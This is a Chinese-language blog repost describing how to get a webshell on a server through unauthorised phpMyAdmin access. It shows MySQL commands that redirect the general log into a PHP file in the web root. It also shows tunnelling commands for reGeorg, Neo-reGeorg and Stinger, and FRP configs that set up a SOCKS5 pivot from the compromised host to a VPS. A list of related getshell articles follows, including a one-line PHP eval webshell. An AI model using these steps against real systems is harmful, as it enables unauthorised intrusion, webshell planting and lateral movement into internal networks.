PhpAdmin-getshell

2024-04-30 15:20
文章标签 getshell phpadmin

本文主要是介绍PhpAdmin-getshell,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

PhpAdmin-getshell

通过未授权成功写入,然后getshell

路径:C:\phpstudy_pro\Extensions\MySQL5.7.26\
写入木马: into写入文件:
使用需看要secure_file_priv的值。
当value为“null”时,不允许读取任意文件
当value为“空”时,允许读取任意文件
value可也已设置为其他路径。
show variables like "%general%";

general_log和general_log_file简述:
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。
开启日志记录:set global general_log = “ON”;再查询日志状态。
set global general_log_file=‘C:/phpstudy_pro/www/shell1.php’;

写入shell1.php

扫描另一个网段发现存在ms17-010和域机器。

代理搭建:

python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
python neoreg.py  -u http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/tunnel.php --proxy socks5://10.1.1.1:8888
毒刺
webshellwindows:start D:/XXX/stinger_server.exe 0.0.0.0
客户端(vps)
./stinger_client -w http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/proxy.php -l 127.0.0.1 -p 60000

 

使用哥斯拉内置代理。


 

搭建FRP

VPS设置服务端

[common]
bind_port = 57000
token = 123qwe    
heartbeat_timeout = 90  
max_pool_count = 5

webshell设置客户端

[common]
server_addr = 1.1.1.1
server_port = 57000
token = 123qwe
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100[socks_test]
remote_port = 10000  
plugin = socks5
plugin_user = admin
plugin_passwd = password
use_encryption = true
use_compression = true

 

这篇关于PhpAdmin-getshell的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/949225

相关文章

高危CNVD获取姿势|用友-U8-OA基础版存在文件上传漏洞getshell

漏洞描述 用友U8-OA基础版存在任意文件覆盖写入漏洞 漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。FOFA指纹: body="致远" && "/yyoa/" && icon_hash="23842899" 产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息 漏洞

WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell

参考资料: Phpmyadmin 脚本/设置.php反序列化漏洞 (WooYun-2016-199433)复现_phpmyadmin scriptssetup.php 反序列化漏洞-CSDN博客  https://blog.csdn.net/haoxue__/article/details/129368455利用pearcmd.php文件包含拿shell(LFI)_pearcmd文件包含-CSD

漏洞挖掘 | 记一次项目上从前台登录到Getshell

这一次要打的目标是一个管理系统,开局一个登录框,按照常规思路是先测测弱口令然后爆破,不行再试试SQL注入,这一次运气较好,admin1,admin直接进去了 进入后台,功能还是很多的 有个上传,不过没啥用,上传php还是被限制了。于是去尝试找找指纹信息 在这里找到了CMS信息,去百度一下历史漏洞 不过不知道版本号,那就一个一个试就行了,最后用一个该C

redis服务连接及常规操作和redis服务getshell

简介 Redis,英文全称是Remote Dictionary Server(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 redis服务于传统服务器不同,redis是内存数据库,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作,因此redis被广泛应用于缓存

mac OS 10.8 下Apache + MySQL + phpAdmin配制方法

搞了一个晚上 T T 终于找到了一个 靠谱的教程 后来据说是用一个MAMP就全部搞定了@@ 囧 虽然之前试图用XAMPP失败了 其实一步一步安装还是蛮快的 搭环境愉快 -_-||

CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析

DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。 在 DedeCMS 5.7.106 及之前的版本中发现一个漏洞。它已被宣布为关键。受此漏洞影响的是未知功能的文件uploads/dede/article_allowurl_edit.php。对参数 allurls 的操作会导致代码注入。攻击可以远程发起。该漏洞已向公众披露并可能被使用。此漏洞的关联标识符为 VDB

Jboss未授权访问getshell(JMX-Console)

漏洞简介 Jboss的webUI界面 http: ip:port/jmx-console 未授权访问(或默认密码 admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell 默认端口:8080 环境搭建 使用docker搭建 docker search testjboss docker pull testjboss/jboss docke

PHPadmin写shell的方法

一、常规导入 shell 的操作创建数据表导出 shell CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL ); INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’); SELECT `content` FROM `sh

Duoduo **多多淘宝客 = v7.2+++++管理权限++GetShell

登陆后台后, 通过抓包工具获取当前会话COOKIE, 再按照程序参数说明填写上抓取的COOKIE.中间过程中EXP程序提示登陆失败的语句, 那就说明你抓取COOKIE是无效的. 这时你就要注意下, 你的COOKIE是否填写正确.细节如下所示. 你用抓包工具抓到的HTTP返回头信息COOKIE部分可能如下: PHPSESSID={cookie} 将{cookie}的字符串部分拷贝出来, 才是适合

phpmyadmin后台getshell方法学习总结

0x00 前言 最近看的一篇文章中提到过phpmyadmin一些后台getshell方式,就想着写篇博客学习总结一下~~ 0x01 getshell方法 一、select into outfile直接写入 1.利用条件 对web目录需要有写权限能够使用单引号知道绝对路径secure_file_priv没有具体值 2.步骤 查看有没有配置secure_file_priv show glo